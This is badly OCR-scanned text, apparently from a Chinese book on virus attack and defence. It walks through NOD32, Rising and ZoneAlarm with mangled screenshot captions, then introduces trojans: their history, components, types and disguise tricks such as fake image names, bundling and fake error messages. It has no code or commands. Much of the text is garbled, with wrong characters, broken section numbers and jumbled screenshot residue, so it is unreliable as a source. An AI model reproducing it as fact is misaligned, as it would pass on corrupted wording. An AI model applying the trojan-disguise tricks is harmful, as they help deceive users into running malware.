都 层出不穷 ， 尤 其 是 在 网 络 时 代 ， 里 虫 病毒 的 传播 速度 快 ， 变 种 多 ， 所 以 必须 随时 更 新 病 
毒 库 ， 以 便 能 够 查 杀 最 狐 的 病毒 。 

3) 提 高 防 杀 毒 意 识 。 不 要 随 蕊 访问 耻 生 的 站 点 ， 因 为 其 中 有 可 能 束 含 有 苯 意 代 公 。 
当 运 行 正 时， 在 “Pternet 区 域 的 安全 级 别 ” 选 项 中 把 安全 级 别 由 “中 ” 改 为 “高 ” 
为 这 一 类 网 页 主要 是 侣 有 恶意 代 但 的 ActiveX 或 Applet、Javascript 的 网 页 文件 ， 在 正 
设置 中 将 ActiveX 控件 和 插件 、Java 小 程序 脚本 等 全 部 禁止 ， 以 大 大 减少 被 网 页 恶意 代 
但 感染 的 几率 。 不 过 , 这 样 做 可 能 会 叶 任 以 后 在 浏览 网 页 过 程 中 , 一 些 正 党 应 用 ActiveX 
的 网 站 也 无 法 浏览 。 

4) 不 随意 得 看 阳 生 邮件 。 一 定 不 要 打开 扩展 名 为 .VBS、.SHS 或 .PIF 的 邮件 附件 。 这 
些 扩 展 名 从 未 在 正常 附件 中 使 用 过 ， 反 而 经 党 被 病 毒 和 蠕虫 使 用 。 


4.6 ”杀毒 软件 的 使 用 


杀毒 软件 也 是 病毒 防范 必 不 可 少 的 工具 ， 随 看 人 们 对 病毒 危害 的 认识 ， 杀 毒 软 件 也 逐 
渐 被 重视 起 来 ， 各 式 各 样 的 杀毒 软件 如 十 后 春 务 般 出 现在 市 场 中 。 

























































































4.6.1 用 NOD32 查 示 病毒 


NOD32 是 近 几 年 中 迅速 刚 起 的 一 球 杀 毒 软件 。 它 以 轻巧 易 用 、 惊 人 的 检测 速度 及 卓越 
的 性 能 深 受 用 户 青 睐 ， 成 为 许多 用 户 和 IT 专家 的 首选 。 经 多 家 检测 权威 确认 ，NOD32 在 
速度 、 精 确 上 度 和 各 项 表现 上 已 拥有 多 项 全 球 纪录 。 

在 使 用 NOD32 进行 查 杀 病毒 之 前 ， 最 好 先 升级 一 下 病毒 库 ， 这 样 才 能 保证 杀毒 软 
件 对 新 型 病毒 的 查 杀 效 果 。 更 新 病毒 库 之 后 ,就 可 以 对 计算 机 进行 最 常用 的 查 杀 病毒 操 
ET 

使 用 NOD32 奏 杀 病毒 的 具体 操作 步骤 如 下 。 
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今 公公 人 
STEP01: 运行 NOD32 STEP02: 对 计算 机 进行 扫描 


(€) ESET NOD32 Antivirus 





ESET NOD32 ANTIVIRUS7 


;0 
扫 摘 : CG:\SRECYCLE.BIN\S-1-5-21-1728124532-1908955518-41546...\libfontconfig-1.dIl 
在 新 窗口 中 打开 扫 六 


和 @ 所 有 扫 挫 结 京 后 计算 机 不 采取 任何 担 作 


操作 系统 不 是 最 新 的 


该 计 Sa 请 通过 Windows Update 慑 务 芒 装 去 > 
新 。 有 关 详细 信息 ， 请 单 去 


级 可 移动 磁盘 扫 摘 
扫 撕 USB、DVD、CD 和 其 他 可 移动 束 
常用 个 运行 吕 训 所 冶 时 
利 统 计 
了 由 ESET 社交 媒体 扫 护 程序 脐 扫 倍 日 去 
8 启用 游戏 模式 
ee 潍 计算 机 扫 生 设置 . 





ESET NOD32 Antivirus 未 激活 
人 ESET NOD32 Antivirus 状态 : 防护 























在 桌面 上 双击 “ESET 单 击 “ 计 算 机 。 默认 进行 智能 扫描 ， 也 可 单 击 “ 自 定义 扫描 ” 选 4 
NOD32 Antivirus” 图 标 ， 扫描 ”选项 卡 。 任意 选取 扫描 的 目标 范围 。 

打开 NOD32 主 界面 。 

STEP03: 查看 扫描 结果 STEP04: 查看 病 背 详细 信息 

MN®) ESET NOD32 Antivinos EEC 


| ESETNOD32 ANTIVIRUS7 


i(e) 计算 机 要 洋 - ESET NOD32 Antivirus 


扫描 进度 

100% 
目标 : E\ 夫 宫 资 料 \ 返 中 病毒 制造 机 \ 榜 忠 病 毒 制造 机 \ 冯 忠 病 毒 制造 机 .exe 
感染 数量 :5 


EM 墨客 资料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5,exe > NSIS > Fluxay46.mht > MIME - 正常 ( 未 执行 内 部 扫 芍 ) 。 
E\ 景 宕 资 幸 \setup_Fluxay5.zip > ZIP > Setup_Fluxay5.exe > NSIS > faq.mht > MIME - 正常 ( 未 执行 内 部 扫 挡 ) 

E'\ 黑 宪 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5,exe > NSIS > form,mht > MIME - 正常 ( 未 执行 内 部 扫 搓 ) 

E'\ 蛙 客 资 料 \Setup_Fluxay5.zip > ZIP > Setup_Fluxay5.exe > NSIS > http.mht > MIME - 正常 ( 未 执行 内 部 汉 措 ) 

E\ 蛙 客 资料 \Setup_Fluxay5.zip > ZIP > Setup_Fluxay5.exe > NSIS > ipc.mht > MIME - 正常 { 未 执行 内 部 扫 瘤 ) 

EX 再 客 资 料 \Setup_Fluxay5.zip > ZIP > Setup_Fluxay5.exe > NSIS > remote.mht > MIME - 正常 ( 未 执行 内 部 扫 撕 ) 

E\ 蛙 客 资料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5,exe > NSIS > sqlmht > MIME - 正常 ( 未 执行 内 部 扫 撕 ) [a 
E\ 蛙 容 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5,exe > NSIS > NTLM,EXE - 可 能 是 Win32/Small,.EHYSOHG 特洛伊 有 
EX\ 蛙 客 资 笠 \sniffer pro 下 载 V4_7_5 中 文 破 解 版 _sniffer 抓 包工 具 - pG 下 载 站 ,mht > MIME - 正常 ( 未 执行 内 部 扫 控 】 ~ 





革 道 加 





及 扫 冶 日 志 
灶 计算 机 扫 拱 设置. 








单 击 " 自 定义 扫描 "或 者 国 单 击 " 在 新 窗口 中 “在 “计算 机 扫描 ”窗口 中 可 查看 详细 的 扫描 过 程 以 
下 方 的 下 三 角 图 标 , 显示 扫 ”打开 扫描 " 选项 。 ”及 扫描 出 病毒 的 详细 信息 。 

描 结果 。 

STEP05: 启用 防护 STEP06: 查看 日 六 文件 寺 等 信息 


ESET NOD32 ANTIVIRUS7 


日 志文 件 计划 任务 
上 一 个 记录 2013/11/14 13:16:46 计划 任 会 数 :7 


防护 统计 隔离 区 
威胁 和 垃圾 邮件 统计 阿 高 的 对 象 数 : 59 
反 隐 藏 保 护 
ESET SysInspector 


查看 活动 
文件 系统 、 网 络 活动 计算 机 状态 快照 数 :0 
Web 和 电子 邮件 运行 进程 


Web 访问 保护 - ESET Live Grid 支持 的 信誉 信息 
电子 上 邮件 客户 党 防护 
网 络 钓鱼 防护 


提交 文件 以 供 分 析 ESET SysRescue 
ESET 实验 室内 的 分 析 创建 修复 CD 
ESET 社交 媒体 扫 摘 程序 

9 社交 网 洛 上 的 帐户 


@ 产品 激活 
人 导入 和 导 当 设置 
闵 进入 进 趾 座 定 .…. 








单 击 “ 设 置 ” 选 项 卡 , 根据 提示 启用 防护 。 单 击 “工具 ”选项 卡 ， 查看 日 志文 件 、 计 划 任 务 、 
防护 统计 以 及 被 隔离 的 文件 等 信息 。 
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< 第 1 





病毒 攻防 


4.0;2 ”于 星 东 短 软 件 


玉 星 全 功能 安全 软件 是 基于 “ 云 安全 ”系统 设计 的 新 一 代 互 联网 安全 产品 ， 将 杀毒 软 
件 与 防火 墙 无 缝 集成、 整体 联动 ， 极 大 降低 计算 机 资源 占用 ， 集 “拦截 、 防 御 、 查 杀 、 你 
护 ” 四 重 防 护 功能 于 一 里 。 

使 用 玉 星 杀毒 软件 进行 杀毒 的 具体 操作 步骤 如 下 。 
STEP01: 启动 瑞星 杀毒 软件 STEP02: 检测 更 新 


备 全 回 一 口 x 














名 
CE 了 
wf 


| 上 次 得 杀 是 15 小 时 前 ， 没 有 发 现 威 腑 本 地 恬 分 为 员 4 。， 登 录 即 刘 领 取 
多 产品 版 本 : 24.00.13.24 , 上 次 更 新 时 间 : 2014-02-08 13:15 
登录 瑞星 账户 


瑞 量 推荐 产品 


画 回 国人 
加 加 图 加 瑞星 v16+ 
re 超 强 杀 索引 擎 来 了 ， 立 刻 体验 


be i 3 瑞星 【忠英 开机 加 汗 】 专 业 , 
兴 丰 国光 站 未 久 免 要 ! 于 星 个 人 防火 培 .。 


: ee 00. 13. | 检测 | 雪 新 it E 检 苦 





双击 桌面 上 的 “瑞星 杀毒 软件 ”图 标 ， 进 入 瑞星 杀 在 主 界面 左下 角 单 击 “ 检 测 更 新 ”链接 。 
毒 软件 主 界面 。 
STEP03: 正在 更 新 STEP04: 选择 快速 查 杀 


管 刘 回 一 口 Xx 管 下 回 一 口 x 


Wy 瑞星 杀毒 






区 瑞星 杀毒 





永久 免费 











日 上 次 查 杀 是 一 个 月 以 前 ， 发 现 了 4 个 威胁 本 地 积分 为 ” 郧 2 ， 登 录 即 刻 领取 
产品 版 本 : 24.00.13.24 ,上 次 更 新 时 间 : 2014-02-08 13:15 
登录 瑞星 账户 
注册 新 用 户 
防 量 准 荐 产品 
回回 
防火 培 ” 安全 助手 “软件 管家 。 浏览 器 
司 a 
回回 |@ 国 


开机 优化 安全 国 购 ”安全 网 址 ”安全 游戏 





更 多 














过 年 全 红包 
FS 

RY 兴旺 (eho 二 业 .- 
总 阴 未 和 久 免 费 ! 瑞星 个 人 防火 培 .… 
NR Ea 人 EENM.. 















瑞星 v16+ 
超 强 杀毒 引擎 来 了 ， 立 刻 体验 音 杀 设置 。“ 日 志 阿 过 区 











检 泊 重新” 牧 坡 推 基 


更 新 完成 后 单 击 “ 升 级 完成 ”按钮 。 返回 主 界面 后 单 击 “快速 查 杀 ”按钮 。 
STEP05: 正在 快速 查 杀 STEP06: 显示 查 杀 结果 


和 曾 人 加 一口 x 


9 2 
A 


图 已 完成 扫描 ,未 发 现任 何 威胁 。 


共 扫 癌 对 和 象 : 26268 个 已 用 时 间 : 00:03:59 发 现 威胁 :0 个 


返回 兽 页 


如 果 您 的 电脑 仍 有 问题 未 解决 ， 可 使 用 专 宗 门 涌 。 ， 在 线 客 服 与 您 一 对 一 服务 ， 


打 使 用 这 频 杀 喜 模 式 
二 电动 处理 检测 出 的 病毒 
口 亲王 后 扬 动 关机 


系统 运行 盟 , 程序 大多 ? 一 私密 信息 如 何 保护 ? BB 
ls 几 全 文件 胃 原 高 汪 度 粉 下 算法 示 .， ”医治 


进程 管理 竺 统 进 程 一 目 了 然 … 系统 修复 修复 被 算 改 系统 设置 … 





产品 版 本 : 24.00.13.24 检 讽 旺 新 ”人 微 博 推荐 


能 能 够 在 短 时 间 内 对 系统 关键 位 置 ( 比 ”扫描 完成 后 ， 软 件 会 自动 处 理 安全 威胁 ， 并 显示 提 
une as 行 查 杀 ， 几 分 钟 内 即 可 完成 。 示 信 息 。 














查 杀 了 
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Ea 
取 ED rr 
未 


命 人 他 他 


STEP07 选择 全 盘查 杀 


-一 一 










| 上 次 查 杀 是 一 个 月 以 前 ,发现 了 4 个 威胁 
WW 严 品 版 本 : 24.00,13.24 ， 上 次 更 新 时 间 : 2014-02-08 13:15 





返回 主 界面 后 单 击 “ 全 盘查 








产品 版 本 : 24.00.13.24 检测 更 新 微 地 推荐 


对 系统 进行 更 为 全 面 的 查 杀 后 ， 软 件 将 会 
查 杀 到 的 安全 威胁 。 
STEP11: ”选择 查 


a] +aD) 


- 口 部 本 地 磁盘 (E:) 


… 口 国 系 筑 引导 区 
口 权 A 
司 系统 目录 





> 





攻防 从 入 门 到 精通 


管 切 回 一 口 Xx 


Cy 瑞星 杀毒 


本 地 积分 为 


瑞星 推荐 产品 


国 回国 旧 


防火 境 安全 助手 ”软件 管家 


图 图 国医 


开机 优化 。 安全 团购 ”安全 网 址 ”安全 游戏 


过 年 信 红包 
积分 帐号 FAQ 
aso] 


杀 ” 按 钮 。 


目 承 


扫 岳 对 象 : 共 558589 个 耗费 时 间 : 04:47:20 


8 2 ”登录 即 刘 领 取 


登录 瑞星 账户 


$ 水 久 免 费 






更 多 





浏览 器 








管 殉 回 一 口 Xx 


vo 扫描 完毕 ， 发 现 安全 威胁 228 个 ， 已 处 理 228 个 . 

[SI 文件 病 吉 全 结 时 
wyqqpc\hook.dll Trojan.Win32.Generic.12319..， 已 清除 
/qqpc\yqu.exe DropperWin32.Delftn 已 清除 
/qqpe\hymm.exe Trojan.DLWin32.VB.fpa 已 清除 
wyqqPc\qqpcdt TrojanWin32.Generic.122CF.… 已 清除 
-Aspack212r BackdoorWin32VB.so 已 清除 
/qqpc\yquz.exe Trojan.Multidrop.c 已 清除 

时 N\ 黑 套 下 载 \hgzyckzrar 
«fhgzyckz\H_Client.exe Backdoor.Gpigeon.zly 已 清除 

后 E\ 新 建文 件 夫 \ 是 容 下 载 \wtltrial.exe Malware.RDM.01!5.7 已 出 除 

如 果 有 文件 误 删 除 的 情况 ,请 到 。 隔 高 区 。 进行 恢复 


2 
be 
















握 作 2 







动 处 理 





义 选 需要 查 杀 的 具体 位 国 单 击 “ 开 始 扫描 ， 


置 ， 进 行 有 针对 性 的 查 杀 。 
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按钮 。 


STEP08: 正在 全 盘查 杀 


一 一 


3 涉 


让 过 站 局 天 一口” 区 


Wd 瑞星 杀毒 















$ 水 久 人 免费 
得 ; 446447 个 

扫 扩 速 度 :72 个 秒 系统 对 急 
已 用 时 间 : 03:23:57 引导 区 已 夫 成 
发 现 威胁 : ”97 个 系统 内 存 je 
已 处 理 威胁 : 96 个 

关键 区 MW 已 完成 

Windows 节 件 已 充 成 
安全 引擎 

信和 过 

加 口 四 :wc ye 

本 地 磁盘 (D:) CY) 正在 扫 阁 
过 售 用 变频 杀毒 模式 本 地 磁 主 (E:) 
后 主动 处 理 检测 出 的 病毒 本 地 磁 家 (F:) 
口 亲 雪 后 自动 关机 王 叶 ( 咱 











产品 版 本 : 24.00.13.24 检测 更 新 ”向 博 推荐 


全 盘查 杀 会 对 所 有 的 系统 对 象 以 及 磁盘 分 区 进行 碍 
杀 ， 扫 描 时 间 较 长 , 短 则 几 十 分 钟 ， 长 则 几 个 小 时 。 


STEP10: 选择 自 定 义 查 杀 


> Xx 


画 图 昌国 面 多 量 Wa 
病 去 查 杀 ，。 电脑 及 优化 。 安全 工具 2 且 心 4 


加 上 次 查 杀 是 15 小 时 前 ,没有 发 现 威 妥 本 jb 了 分 为 人 @ 人 4 。， 登 录取 刻 领 双 
4 


登录 瑞星 账户 


产品 版 本 : 24.00,13,24 ， 上 次 更 新 时 间 : 2014-02-08 13:15 


四 自 定义 查 杀 导 
音 杀 指定 目录 内 的 文件 , 确保 文件 安全 加 | 


互联 网 安全 状态 : 安全 目前 互联 网 安全 形 劳 全 好 

辕 忠 沛 并 加 疙 至 【〔 电 胶 开 机 hn 速 ] 专业 .… 
瑞星 v16+ 
超 强 杀毒 引擎 来 了 ， 立 刻 体 验 





返回 主 界面 后 单 击 “ 自 定义 查 


杀 ” 按 钮 。 


i 口头 


EF On 


STEP12: 正在 查 杀 


病 击 介 未 






下 定义 查 杀 : W:\Temporary Internet,.\HMLD4UVANcrossdomain[I].xml 


| 26% I 国 缩 略 模式 















共 扫 闯 对象 : 125 个 : 
共生 地 克 ， 69 个 大 自 定义 扫 拱 对 急 
已 用 时 间 : 00:00:02 tutuDisk(W:) CY 正在 扫 闪 


发 现 威 胁 : 0 个 
已 处 至 威胁 : 0 个 
安全 引擎 ; 


BOEBOe 


卫 使 用 变频 杀 豆 模式 
后 县 动 处 理 检测 出 的 病 委 
口 亲 宕 后 合 动 关机 





产品 版 本 : 24.00.13.24 


扫描 对 象 数 、 已 用 时 间 以 及 发 现 的 威胁 等 信息 会 
界面 左 侧 显示 。 


病 毒 攻防 


备 巡回 一 口 x 






?EE 瑞星 杀毒 
信永 入 旬 要 







图 已 完成 扫描 ， 未 发 现任 何 威胁 。 


共 扫 摘 对 象 : 473 个 已 用 时 间 : 00:00:09 发 现 威胁 : 0 个 


扫描 完成 后 ， 软 件 会 自行 处 理 安 全 威胁 并 显示 提示 


返回 首页 入 
吕 /NO 


如 时 处 的 电脑 仍 有 问题 未 解决 ,可 使 用 专家 门诊 。 ， 在线 客 最 与 您 一 对 一 骤 务 。 






系统 运行 慢 , 程序 太 多 ? EEE 。 私 记 信 息 如 何 保护 ? | dk? 
进程 管理 系统 进程 一 了 然 .。 。 山中 。 文件 夫 碎 高 强度 粉 下 算法 永久 .。 。 医治。 条 统 修 复 修复 被 自 改 系统 设置 .。 





4.0.3 免费 费 的 个 人 防火 场 LoneAlarm 


ZoneAlarm 强大 的 双 反问 防火 场 能够 监控 个 人 计算 机 和 互联 网 传 入 和 传 出 的 流量 ， 能 够 
阻止 黑客 进入 一 台 个 人 计算 机 发 动 攻 击 并 人 盘 取信 息 。 同 时 ，ZoneAlarm 的 强大 的 反 病 毒 引 
莹 可 检测 和 阻止 病毒 、 间 谍 软 件 、 特 洛 伊 木马、 蠕虫 、 人 僵尸 和 rootkit。 

下 面 介 绍 ZoneAlarm 的 使 用 ， 有 具体 操作 步骤 如 下 。 


STEP01: 运行 ZoneAlarm 主 程 友 STEP02: 打开 防火 墙 界 面 


LA ZoneAlarm en = 
| ZoNEALARM Sl Check Point NN 


| Free Antivirus + Firewall a A Free Antivirus + Firewall 











7 YOUR COMPUTER IS SECURE 


IDENTITY & DATA 


ANTIVIRUS a 0} IDENTITY & DATA 
= -一 一 = : i 


Your computer is protected Your Se ea Se cted 
from viruses and spyware. Ek 于 pi from malic 
©] i attempting 本 i your 
identity and 这 














单 击 “FIREWALL”( 防火 墙 ) 图 标 。 单 击 “ON ”按钮 单 击 "413.access 
开启 防火 墙 功 能 。 attempts blocked” 
链接 。 


STEP03: 人 防火墙 设置 STEP04: 返回 主 界 面 


ZoneAlarm onccemm 
ZONEALARM 


NE 
Free Antivirus + Firewall i a i 








Alert Events Shown 
Oigh 
夯 Xedium Show only high rated 
alerts. 全 IDENTITY & DATA 


Dros 


attempti i i 
identity and data. 














设置 警报 级 别 、 是 否 开启 事件 日 志 以 及 程序 警报 日 ” 单 击 “ANTIVIRUS "(病毒 防护 ) 图 标 。 


志 级 别 。 
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EE 
了 芭 
尖 
全 人 人 他 
STEP05: 病毒 防护 设置 





ZONEALARMN 
Free Antivirus + Firewall 


局 om COMPUTER IS _ SECURE 
NA SNK 


各 ANTIVIRUS 


ntivirus 县 Anti 一 sp 了 ware 


etects and TY620V65 SP7WaYS and Viruses 
39 virus (es) have been detected 


Real-time Protection Scan Results 
0 files scanned 


89 virus (es) found 
Last Nert 4 1 


Antivirus Nov 21, Nov 28, 2013 guarantined 
SS 2013 


Er 
Antivirus Today at Today at 
J Update 09:54 AX 04:17 F¥ 








Sl Check Point 


Scan Update Tune-up Tools Help 
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防 从 入 门 到 精通 


选择 开启 病毒 防护 功能 。 


本 章 主 要 揭露 木马 的 伪装 手段 、 捆 绑 木 马 和 反弹 端口 木马 、 木 马 程序 的 免 
杀 以 及 木马 清除 工具 的 使 用 等 , 可 有 效 帮 助 用 户 避 免 自己 的 计算 机 中 木马 病毒 ， 
从 而 保障 系统 的 安全 性 。 


O 〇 木马 的 组 成 与 分 类 


O 木马 的 伪装 与 生成 
O 木马 的 加 这 与 脱 碗 
O 木马 的 清除 





> 
攻防 从 入 门 到 精通 





5.1 认识 木马 


木马 (Trojan) 与 计算 机 网 络 中 常 第 要 用 到 的 远程 控制 软件 有 些 相 似 ， 通 过 一 段 特 定 














的 程序 木马 程序 ) 来 控制 另 一 台 计 算 机 ， 从 而 窃 取 用 户 资料 ， 破 坏 用 户 的 计算 机 系统 等 。 
9.1.1 木马 的 发 展 历程 


“木马 ”一 词 来 源 于 十 希 有 参 传说 “人知 马 史诗 中 木马 计 ” 的 故事 。 木 马 程序 技术 发 展 可 谓 
非常 迅速 ， 主 要 是 有 些 年 轻 人 出 于 好 奇 ， 或 是 急于 显示 上 自己 实力 ， 不 断 改进 木马 程序 的 编 
号。 至今， 木马 程序 已 经 经 历 了 六 代 的 改进 。 

第 一 代 : 最 原始 的 木马 程序 ， 主 要 是 简单 的 密码 窃取 ， 通 过 电子 邮件 发 送信 息 等 ， 具 
备 了 木马 最 基本 的 功能 。 

第 二 代 : 在 技术 上 有 了 很 大 的 进步 ， 冰 河 是 中 国 木马 的 典型 代表 之 一 。 

第 三 代 : 主要 改进 在 数据 传递 技术 方面 ， 出 现 了 ICMP 等 类 型 的 森马， 利用 畸形 报 文 
传递 数据 ， 增 加 了 杀毒 软件 查 杀 识别 的 难度 。 

第 四 代 : 在 进程 隐藏 方面 有 了 很 大 改动 ， 采 用 了 内 核 插 入 式 的 般 入 方式 ， 利 用 远程 搬 
入 线程 技术 舱 入 DLL 线程 。 或 者 挂 接 PSAPI， 实 现 木 马 程序 的 隐藏 ， 甚 至 在 Windows 
NT/2000 下 ， 都 达到 了 展 好 的 隐藏 效果 。 灰 饱 子 和 蜜蜂 大 咨 是 比较 出 名 的 DLL 木马 。 

第 五 代 : 驱动 级 木马 。 驱 动 级 木马 多 数 都 使 用 了 大 量 的 Rootkit 技术 来 达到 在 深度 隐 减 
的 效果 ， 并 深入 到 内 核 空 间 ， 感染 后 针对 杀毒 软件 和 网 络 防火 墙 进行 攻击 , 可 将 系统 SSDT 
初始 化 ， 导 致 杀毒 防火 墙 失 去 效应 。 有 的 驱动 级 木马 可 驻 留 BIOS， 并 且 很 难 碍 杀 。 

第 六 代 : 随 着 身份 认证 USB Key 和 杀毒 软件 主动 防御 的 兴起 ， 符 虫 技 术 类 型 和 特殊 反 
显 技术 类 型 木马 逐渐 开始 系统 化 。 前 者 主要 以 资 取 和 算 改 用 户 敏 感 信息 为 主 ， 后 者 以 动态 
口令 和 硬 证 书 攻 击 为 主 。PassCopy 和 暗黑 蜘蛛 侠 是 这 类 木马 的 代表 。 


5.1.2 木马 的 组 成 


一 个 完整 的 木马 由 三 部 分 组 成 : 便 件 部 分 、 软 件 部 分 和 具体 连接 部 分 。 这 三 部 分 分 别 
有 看 不 同 的 功能 。 

1. 硬件 部 分 

便 件 部 分 是 指 建 立木 马 连 接 必 需 的 便 件 实体 ,包括 控 制 端 、 服 务 关 和 Internet 三 部 分 。 

@ 控制 让: 对 服务 山 进 行 远 程控 制 的 一 奖 。 

@ 服务 靖 : 航 控 制 病 远 程控 制 的 一 端 。 

@ Internet: 是 数据 传输 的 网 络 载体 ， 欣 制 奖 通 过 Internet 远程 控制 服务 病 。 

2. 软件 部 分 

软件 部 分 是 指 实 现 远 程控 制 所 必需 的 软件 程序 ， 主 要 包括 控制 端 程序 、 服 务 端 程序 和 
木马 配置 程序 三 部 分 。 

@ 控制 应 程序 : 控制 庙 用 于 远程 控制 服务 喘 的 程序 。 

@ 服务 新 程序 又 称 为 木马 程序 。 它 湾 藏 在 服务 端 内 部 ， 回 指定 地 点 发 送 数据 ， 如 网 

络 游戏 的 密码 、 即 时 通信 软件 密码 和 用 户 上 网 密码 等 。 
@ 木马 配置 程序 : 用 户 设置 木马 程序 的 端口 号 、 触 发 条 件 、 木 马 名 称 等 属性 ， 使 得 服 
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ee 闭 得 更 加 隐 向 。 
3. 具体 连接 音 
具体 连 楼 部 分 是 指 通过 Internet 在 服务 站 和 控制 站 之 间 建 立 一 条 木马 通道 所 必需 的 元 
素 ， 包 括 控 制 端 /服务 端 了 P 和 控制 端 /服务 病 端 口 两 部 分 。 
@ 控制 端 /服务 端 下: 木马 控制 端 和 服务 并 的 网 络 地 址 ， 是 木马 传输 数据 的 目的 地 。 
@ 控制 问 / 服 务 靖 问 口 : 木马 控制 喘 和 服务 端的 数据 入 口 ， 通 过 这 个 入 口 ， 数 据 可 以 直 
达 控 制 端 程序 或 服务 端 程序 。 


5.1.3 木马 的 分 类 


随 着 计算 机 拉 术 的 发 展 ， 木 马 程 序 拉 术 也 发 展 迅 速 。 现 在 的 木马 已 经 不 仅仅 具有 单一 
的 功能 ， 而 是 集 多 种 功能 于 一 身 。 根 据 木 马 功 能 的 不 同 ， 可 以 将 其 划分 为 破坏 型 木马 、 远 
程 访问 型 木 蕊 、 密 码 发 送 型 木马 、 键 癌 型 记录 木马 、DoS 型 攻击 木马 等 。 

1. 破坏 型 木马 

这 种 木马 的 唯一 功能 了 驶 是 破坏 并 且 删 除 计算 机 中 的 文件 ， 因 此 一 旦 感染 ， 驶 会 严重 威 
胁 到 计算 机 的 安全 ， 非 常 危险 。 不 过 ， 像 这 种 恶意 破坏 的 木马 ， 黑 客 也 不 会 随意 传播 。 

2. 远程 访问 型 木马 

这 种 木马 是 一 种 使 用 很 广泛 并 且 和 危害 很 大 的 木马 程序 。 它 可 以 远程 访问 并 且 直 接 欣 制 
和 被 入 侵 的 计算 机 ， 从 而 任意 访问 该 计算 机 中 的 文件 ， 获 取 计 算 机 用 户 的 私人 信息 ， 例 如 银 
行 账号 和 密码 等 。 

3. 密码 发 送 型 木马 

这 是 一 种 专门 用 于 盗 取 目标 计算 机 中 密码 的 木马 文件 。 有 些 用 户 为 了 方便 使 用 
Windows 的 密 公 记忆 功能 进行 登录 ， 有 些 用 户 喜 欢 将 一 些 密码 信息 以 文本 文件 的 形式 存放 
于 计算 机 中 ， 虽 然 这 样 确 实 为 用 户 带 来 了 一 定 方便 ， 但 是 正好 为 密 但 发 送 型 木马 市 来 了 可 
乘 之 机 ， 它 会 在 用 户 未 曾 发 觉 的 情况 下 ， 搜 集 密码 发 送 到 指定 的 邮箱 ， 从 而 达到 咨 取 密 码 
的 目的 。 

4. 键盘 记录 型 木马 

这 种 木马 非 第 人 徐 单 ， 它 通 第 只 做 一 件 事 ， 丈 是 记录 目标 计算 机 键盘 遍 击 的 按键 信息 ， 
并 且 在 LOG 文件 中 碍 找 密码 。 该 木马 可 以 随 看 Windows 的 启动 而 局 动 ， 并 且 有 在 线 记录 
和 离线 记录 两 个 选项 ， 从 而 记录 用 户 在 在 线 和 离线 状态 下 敲 击 键盘 的 按键 情况 ， 从 中 提取 
蜜 但 等 有 效 信 息 。 当 然 ， 这 种 木马 也 有 邮件 发 送 功能 ， 需 要 将 信息 发 送 到 指定 的 邮箱 中 。 

5. DoS 攻击 型 木马 

随 看 DoS 攻击 的 广泛 使 用 , DoS 攻击 木马 使 用 得 也 越 来 越 多 。 黑 客 入侵 一 侣 计算 机 后 ， 
在 该 计算 机 上 种 上 DoS 攻击 木马 ， 以 后 这 人 台 计 算 机 也 会 成 为 黑客 攻击 的 帮手 。 黑 客 通过 扩 
充 控 制 肉鸡 的 数量 来 提高 DoS 攻击 取得 的 成 功率 。 这 种 木马 不 是 致力 于 感染 一 全 计算 机 ， 
而 是 通过 它 攻 击 一 台 又 一 人 台 计 算 机 ， 从 而 造成 很 大 的 网 络 伤害 并 且 带 来 损失 。 


5.2 ”木马 的 伪 和 闪 与 生成 


墨客 们 往往 会 使 用 多 种 方法 来 伪 猴 木马 ， 以 降低 用 户 的 警惕 性 ， 从 而 其 电 用 户 。 为 让 
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用 户 执行 木马 程序 ， 墨 客 须 通 过 各 种 方式 对 木马 进行 伪装 ， 如 伪装 成 网 页 、 图 片 、 电 子 书 
等 。 该 者 顷 了 解 黑 客 伪 猴 木马 的 各 种 方式 ， 才 能 避免 上 当 受 驻 。 


























3.2.1 木马 的 伪 疙 手段 坚 光 


越 来 越 多 的 人 对 木马 了 解 和 防范 的 意识 加 强 , 对 木马 传播 起 到 了 一 定 的 抑制 作用 , 为 此 ， 
木马 设计 者 们 就 开发 了 多 种 功能 来 伪装 木马 ， 以 达到 欺骗 用 户 的 目的 。 下面 束 来 详细 了 解 木 
马 的 常用 伪装 方法 。 

1. 修改 图 标 

现在 已 经 有 木马 可 以 将 木马 服务 端 程序 的 图 标 改 成 HTML、TXT、ZIP 等 各 种 文件 的 
图 标 ， 这 就 使 其 具备 了 相当 大 的 迷惑 性 。 不 过 ， 目 前 提供 这 种 功能 的 木马 还 很 少见 ， 并 且 
这 种 伪装 也 极 易 识破 ， 所 以 不 必 过 于 担心 此 类 木马 。 

2. 冒充 图 片 文 件 

这 是 许多 黑客 常用 来 骗 别 人 执行 木马 的 方法 ， 束 是 将 木马 说 成 图 像 文 件 ， 比 如 照片 ， 
虽说 这 样 是 不 合 逻 辑 的 ， 但 却 使 很 多 人 中 招 。 只 要 入 侵 者 将 木马 程序 扮 成 照片 并 更 改 服 务 
端 程序 的 文件 名 为 “类 似 ” 图 像 文件 的 名 称 ， 再 假装 传送 照片 给 受害 者 ， 不 少 受害 者 就 会 
立刻 执行 它 。 

3. 文件 捆绑 

半 意 捆绑 文件 伪装 手段 是 将 木马 捆绑 到 一 个 安 猜 程序 上 ， 当 用 户 在 安 猜 该 程序 时 ， 木 
马 就 偷偷 地 潜入 了 系统 。 被 捆绑 的 文件 一 般 是 可 执行 文件 ( 即 EXE 和 COM 一 类 的 文件 )。 
这 样 做 对 一 般 人 的 迷惑 性 很 大 ， 而 且 即 使 他 以 后 重 装 系统 了 ， 如 果 他 的 系统 中 还 保存 了 那 
个 “游戏 ” 就 有 可 能 再 次 中 招 。 

4 出错 信息 显示 

众所周知 ， 当 在 打开 一 个 文件 时 ， 如 果 程 序 没有 任何 反应 ， 它 很 可 能 束 是 一 个 木马 程 
序 。 为 规避 这 一 缺 了 哆 ， 已 有 设计 者 为 木马 提供 了 一 个 出 钳 显 示 功 能 。 访 功能 允许 在 服务 端 
用 户 打 开 木 马 程序 时 ， 弹 出 一 个 假 的 出 错 信息 提示 框 〈 内 容 可 目 由 定义 )， 诸 如 “文件 已 破 
坏 ， 无 法 打开 !” 人 信息， 当 服 务 端 用 户 信以为真 时 ， 木 马 已 经 悄悄 侵入 了 系统 。 

5. 把 木马 伪装 成 文件 夹 

把 木马 文件 伪装 成 文件 夹 图 标 后 ， 将 其 放 在 一 个 文件 夹 中 ， 然 后 在 外 徊 再 套 三 四 个 
